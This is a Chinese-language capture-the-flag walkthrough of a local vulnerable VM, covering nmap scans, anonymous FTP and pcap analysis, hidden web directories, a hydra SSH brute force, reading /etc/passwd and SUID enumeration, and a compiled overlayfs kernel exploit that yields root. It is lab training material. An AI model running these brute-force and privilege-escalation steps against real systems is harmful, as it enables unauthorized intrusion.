端口
nmap主机发现
nmap -sn 192.168.178.0/24 Nmap scan report for 192.168.178.33 Host is up (0.00020s latency). 33是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.178.33 -p- --min-rate 10000 -oA nmap/scan 扫描开放端口保存到 nmap/scan下 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 发现开放3个端口
nmap -sT -sC -sV -O -p21,22,80, -oA nmap/scan 192.168.178.33详细端口扫描: -sT:完整tcp连接 -sC:默认脚本扫描 -sV:服务版本探测 -O:系统信息探测 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.178.47 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable] 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d618d9ef75d31c29be14b52b1854a9c0 (DSA) | 2048 ee8c64874439538c24fe9d39a9adeadb (RSA) | 256 0e66e650cf563b9c678b5f56caae6bf4 (ECDSA) |_ 256 b28be2465ceffddc72f7107e045f2585 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). | http-robots.txt: 1 disallowed entry |_/secret |_http-server-header: Apache/2.4.7 (Ubuntu) 分析: 21ftp端口可以匿名登录 80端口有/secret目录和robots.txt文件
立足
21端口
ftp 192.168.178.33 Anonymous登录 发现lol.pcap文件,下载:get lol.pcap 然后分析,这里面大多是tcp和ftp的包,tcp的都是握手包直接过滤,仅查看ftp和ftp-data包,如下图
这里可以看到有很多类似:PASS、SYST、PORT等的命令,可以通过如下网址进行解析:
https://www.serv-u.com/resources/tutorial/host-allo-prot-stru-type-auth-ccc-ftp-command最主要是上面选中的三个包,RETR是客户端ftp的请求命令,服务器响应,ftp-data包里包含请求文件secret_stuff.txt文件的内容
如下,是ftp-data内容包含了secret_stuff.txt文件的内容
解析:他让我们把sup3rs3cr3tdirlol当作目录,在此之前我们应先尝试收集其他80端口信息
80端口
主页面就一张恶搞图片,源代码页面没有其他内容,图片也没有隐写什么东西(exiftools或strings跑一下) robots.txt内容:Disallow: /secret 那么我们访问:http://192.168.178.33/secret/,情况根主页面一样,一张图,什么内容都没有 gobuster爆破目录,无任何新内容
利用收集到的sup3rs3cr3tdirlol信息
解析:他让我们把sup3rs3cr3tdirlol当作头,那么我们直接访问http://192.168.178.33/sup3rs3cr3tdirlol/ 发现有个文件roflmao,wget下来,执行,显示如下结果: Find address 0x0856BF to proceed 解析: 这里说尝试0x0856BF地址,我以为要查看文件的0x0856BF地址,但这显然超出了文件范围,源文件只有7.1k。 其实它是让我们将0x0856BF作为网页目录输入,结果如下: 是一个目录,我将展示目录的所有内容,所以就不截图了 good_luck/目录下有个 which_one_lol.txt 文件 this_folder_contains_the_password/目录下有个Pass.txt文件 wget下来,查看其内容
Pass.txt内容: Good_job_:) which_one_lol.txt内容: maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow 目前推测 Pass.txt存储密码,which_one_lol.txt存储用户名
尝试爆破
hydra -L which_one_lol.txt -P Pass.txt 192.168.178.33 ssh 爆破不出来,完了只能看walkthrough了,看看攻略怎么打吧 看完攻略后才知道,密码是Pass.txt,它其实是个文件名,但是文件名就是密码,博主解释说因为this_folder_contains_the-password意思是这个文件夹本身就是密码 那么我们将"Pass.txt"添加到Pass.txt,再来一次爆破吧 hydra -L which_one_lol.txt -P Pass.txt 192.168.178.33 ssh 成功了! [22][ssh] host: 192.168.178.33 login: overflow password: Pass.txt
提权
信息枚举
sudo -l:无权限 cat /etc/passwd:没有新的信息 cat /etc/crontab:无权限 find / -type f -perm -u=s 2>/dev/null:拿过去根gtfobins网址比对看看是否可提权,没有任何利用 服务敏感信息收集:没有任何服务的敏感信息 敏感历史信息收集:看到Thr0ll用户下的.vim隐藏文件,无权限打开 只能尝试:内核或服务漏洞提权
内核漏洞提权
信息枚举:
服务:
vsftpd 3.0.2
Apache/2.4.7
系统:
linux 3.13.0-32-generic ubuntu
searchsploit查一下,ftp和apache没有提权漏洞利用
linux查一下:发现符合条件的漏洞有3个(其实是两个):
Linux Kernel 3.13 - SGID Privilege Escalation
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access
3个都看看哪个最简单,发现第二个(是个.c文件)的最简单,编译运行即可,那我们直接传上去编译运行
gcc ./37292.c -o ofs
./ofs
直接root
1755
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
